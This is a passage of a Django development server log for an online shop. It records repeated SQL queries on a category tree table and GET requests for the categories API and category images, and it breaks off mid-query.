2019-12-27 06:47:06,310 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:47:06,317 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:47:06,321 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:47:06,325 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:47:06,329 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:47:06,333 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:47:06,337 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:47:06,342 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:47:06,346 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:47:06,350 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:47:06,355 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:47:06,360 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:47:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 06:47:07] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [27/Dec/2019 06:47:07] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-27 06:47:13,834 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-27 06:47:13,842 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [27/Dec/2019 06:47:13] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-27 06:47:13,906 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:47:13,913 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:47:13,919 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:47:13,922 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:47:13,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:47:13,932 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:47:13,934 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:47:13,936 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:47:13,939 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:47:13,942 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:47:13,944 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:47:13,947 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:47:13,949 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:47:13,951 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:47:13,955 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:47:13,957 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:47:13,960 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:47:13,962 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:47:13,964 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:47:13,968 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:47:13,970 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:47:13,973 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:47:13,976 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:47:13,979 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:47:13,983 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:47:13,987 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:47:13,991 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:47:13,994 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:47:13,997 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:47:14,001 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:47:14,006 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:47:14,009 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:47:14,012 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:47:14,015 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:47:14,019 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:47:14,023 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:47:14,026 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:47:14,028 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:47:14,031 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:47:14,033 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:47:14,036 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:47:14,039 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:47:14,041 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:47:14,044 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:47:14,047 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:47:14,049 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:47:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 06:47:14] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [27/Dec/2019 06:47:14] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [27/Dec/2019 06:47:14] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [27/Dec/2019 06:47:14] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [27/Dec/2019 06:47:14] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [27/Dec/2019 06:47:14] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [27/Dec/2019 06:47:16] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [27/Dec/2019 06:47:17] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [27/Dec/2019 06:47:17] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-27 06:48:39,507 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 06:48:39,515 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [27/Dec/2019 06:48:39] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 06:48:39,585 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:48:39,594 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:48:39,599 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 